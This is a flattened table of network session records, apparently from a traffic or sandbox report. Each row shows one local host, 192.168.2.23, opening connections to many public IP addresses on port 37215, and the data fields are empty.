                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8927192.168.2.2360180197.248.65.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8928192.168.2.234205014.216.105.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8929192.168.2.2343714157.185.27.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8930192.168.2.233946241.247.12.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8931192.168.2.235143841.10.105.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8932192.168.2.236087441.95.247.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8933192.168.2.233782641.17.22.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8934192.168.2.234723641.226.99.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8935192.168.2.2355624157.103.188.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8936192.168.2.234085641.124.113.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8937192.168.2.2348302157.124.80.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8938192.168.2.2342136197.192.222.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8939192.168.2.235485841.145.46.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8940192.168.2.2334838157.58.248.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8941192.168.2.2358218197.7.55.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8942192.168.2.2356986157.208.197.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8943192.168.2.2343748197.207.51.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8944192.168.2.234015084.196.76.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8945192.168.2.2344960157.154.6.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8946192.168.2.2346096157.224.131.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8947192.168.2.2338764197.128.158.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8948192.168.2.2358794197.124.107.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8949192.168.2.234940641.73.245.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8950192.168.2.235032241.215.155.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8951192.168.2.2332794197.60.110.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8952192.168.2.2340078132.67.3.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8953192.168.2.233477037.174.45.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8954192.168.2.234941442.207.123.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8955192.168.2.2360106157.27.41.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8956192.168.2.2332922181.30.75.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8957192.168.2.234446432.19.160.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8958192.168.2.235200041.88.221.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8959192.168.2.2351568157.48.70.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8960192.168.2.2348822197.165.55.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8961192.168.2.2350396197.110.142.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8962192.168.2.2340544157.254.22.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8963192.168.2.2358514157.150.18.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8964192.168.2.2342080157.37.161.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8965192.168.2.233782041.240.76.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8966192.168.2.234747841.230.243.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8967192.168.2.2349510197.76.152.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8968192.168.2.2356078197.21.59.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8969192.168.2.234298041.251.83.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8970192.168.2.233891467.241.76.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8971192.168.2.2336876114.102.180.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8972192.168.2.2353396197.207.115.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8973192.168.2.234013641.220.216.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8974192.168.2.235550441.206.67.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8975192.168.2.2358152175.181.35.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8976192.168.2.2350394157.166.235.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8977192.168.2.2351666197.101.127.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8978192.168.2.235147441.210.7.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8979192.168.2.2342334157.106.28.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8980192.168.2.235485641.97.139.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8981192.168.2.2359526157.132.125.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8982192.168.2.2355162157.49.165.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8983192.168.2.234561061.143.75.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8984192.168.2.2353850133.139.96.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8985192.168.2.2356868206.47.6.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8986192.168.2.235984877.249.249.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8987192.168.2.2336542207.152.74.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8988192.168.2.2337116197.106.243.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8989192.168.2.2353264157.39.77.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8990192.168.2.2336906157.9.152.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8991192.168.2.2338540157.183.217.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8992192.168.2.2338272197.100.131.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8993192.168.2.2359336157.24.212.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8994192.168.2.2340802197.119.110.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8995192.168.2.234956641.119.140.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8996192.168.2.2334822197.39.118.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8997192.168.2.2349884157.20.14.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8998192.168.2.2339338200.168.69.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8999192.168.2.2347020157.136.239.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9000192.168.2.2343720157.234.139.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9001192.168.2.2340662157.220.80.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9002192.168.2.2354074109.112.162.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9003192.168.2.233366037.252.248.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9004192.168.2.2336778157.146.218.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9005192.168.2.23494841.83.184.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9006192.168.2.2359144157.233.201.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9007192.168.2.233757641.56.113.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9008192.168.2.236048841.36.31.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9009192.168.2.2352036197.248.72.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9010192.168.2.233712041.2.103.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9011192.168.2.235569241.114.124.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9012192.168.2.2339316106.122.113.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9013192.168.2.2354562132.182.177.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9014192.168.2.2354444197.169.44.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9015192.168.2.2359478157.240.17.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9016192.168.2.2355892197.28.209.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9017192.168.2.2355914157.38.240.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9018192.168.2.2337436157.2.198.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9019192.168.2.235974841.183.255.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9020192.168.2.2343338197.239.79.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9021192.168.2.2344270197.194.176.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9022192.168.2.2341442197.56.9.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9023192.168.2.2334662157.131.188.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9024192.168.2.234004441.4.236.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9025192.168.2.2353302115.7.143.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9026192.168.2.2359716157.193.217.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9027192.168.2.234615841.142.119.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9028192.168.2.2356258197.171.220.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9029192.168.2.2334828157.177.28.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9030192.168.2.234965424.38.117.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9031192.168.2.234149841.104.95.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9032192.168.2.2352182197.14.126.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9033192.168.2.2359592197.237.223.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9034192.168.2.2340124197.231.183.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9035192.168.2.233447841.196.30.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9036192.168.2.2334214157.175.17.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9037192.168.2.2348184157.83.20.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9038192.168.2.2341862197.151.132.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9039192.168.2.2348076157.30.161.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9040192.168.2.234300841.2.0.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9041192.168.2.2347824197.202.101.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9042192.168.2.2338018146.35.110.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9043192.168.2.2360054197.5.68.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9044192.168.2.235569241.83.109.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9045192.168.2.2355578137.190.119.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9046192.168.2.234150637.223.18.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9047192.168.2.2335498197.172.137.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9048192.168.2.2353536197.199.10.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9049192.168.2.234448841.189.141.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9050192.168.2.235756841.84.226.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9051192.168.2.2339552197.86.202.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9052192.168.2.2355824126.67.186.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9053192.168.2.2346330157.191.248.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9054192.168.2.2357062197.178.158.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9055192.168.2.2337640222.43.58.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9056192.168.2.2339020157.187.83.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9057192.168.2.2347896197.164.89.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9058192.168.2.2343944146.164.250.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9059192.168.2.2346366183.28.248.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9060192.168.2.2352526197.4.82.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9061192.168.2.235275441.35.61.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9062192.168.2.234096641.115.12.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9063192.168.2.233363841.244.63.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9064192.168.2.2357306157.180.189.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9065192.168.2.2336412197.212.216.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9066192.168.2.236039041.220.42.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9067192.168.2.2347052157.43.119.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9068192.168.2.235405079.39.141.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9069192.168.2.2354850197.214.22.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9070192.168.2.233570241.118.34.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9071192.168.2.233910620.163.95.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9072192.168.2.235625241.60.12.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9073192.168.2.2336488157.70.213.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9074192.168.2.235530241.88.167.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9075192.168.2.235521241.3.66.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9076192.168.2.2352366151.64.252.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9077192.168.2.233373641.238.208.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9078192.168.2.2339448197.4.0.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9079192.168.2.2338698173.2.92.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9080192.168.2.2357478197.213.109.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9081192.168.2.2341260157.52.12.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9082192.168.2.2341692197.10.60.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9083192.168.2.235586637.56.206.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9084192.168.2.2342854197.168.37.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9085192.168.2.235027041.245.17.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9086192.168.2.2359676197.128.164.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9087192.168.2.2335304197.26.39.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9088192.168.2.234675041.187.113.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9089192.168.2.2354668197.54.91.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9090192.168.2.2345838157.29.33.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9091192.168.2.234170819.117.69.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9092192.168.2.235034641.181.193.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9093192.168.2.2354628145.155.86.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9094192.168.2.2333160190.251.238.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9095192.168.2.2358722157.226.38.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9096192.168.2.2358280197.1.33.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9097192.168.2.234983249.105.152.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9098192.168.2.2358110157.150.85.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9099192.168.2.234475441.189.136.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9100192.168.2.2352324157.169.218.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9101192.168.2.2337624157.227.72.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9102192.168.2.2344540157.179.202.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9103192.168.2.2339478197.76.169.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9104192.168.2.2348806157.11.233.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9105192.168.2.2350726140.191.65.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9106192.168.2.2335786174.228.235.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9107192.168.2.2351088157.177.95.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9108192.168.2.2339816197.49.158.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9109192.168.2.2357580157.209.113.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9110192.168.2.236010441.127.21.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9111192.168.2.234129241.110.214.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9112192.168.2.233647080.32.224.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9113192.168.2.234633041.151.165.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9114192.168.2.2353654197.79.137.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9115192.168.2.233654641.49.74.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9116192.168.2.234967041.71.194.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9117192.168.2.2351844157.32.128.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9118192.168.2.2354440197.204.232.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9119192.168.2.233822041.44.168.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9120192.168.2.2344084157.73.82.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9121192.168.2.234033090.97.123.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9122192.168.2.234092491.67.203.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9123192.168.2.235213041.25.123.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9124192.168.2.2336862129.110.190.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9125192.168.2.233311241.215.15.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9126192.168.2.2340562157.84.167.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9127192.168.2.234594886.10.48.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9128192.168.2.2339698113.188.162.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9129192.168.2.233924641.226.97.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9130192.168.2.235848641.155.109.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9131192.168.2.2346354157.61.31.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9132192.168.2.2344416126.252.121.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9133192.168.2.235015641.116.95.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9134192.168.2.2348494157.182.229.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9135192.168.2.2360562157.214.54.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9136192.168.2.2358624157.74.45.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9137192.168.2.235762441.137.3.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9138192.168.2.2336354157.199.150.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9139192.168.2.2348056157.45.138.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9140192.168.2.234130241.26.111.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9141192.168.2.235884039.12.189.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9142192.168.2.2349654157.87.206.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9143192.168.2.2356134110.107.40.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9144192.168.2.235431658.254.48.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
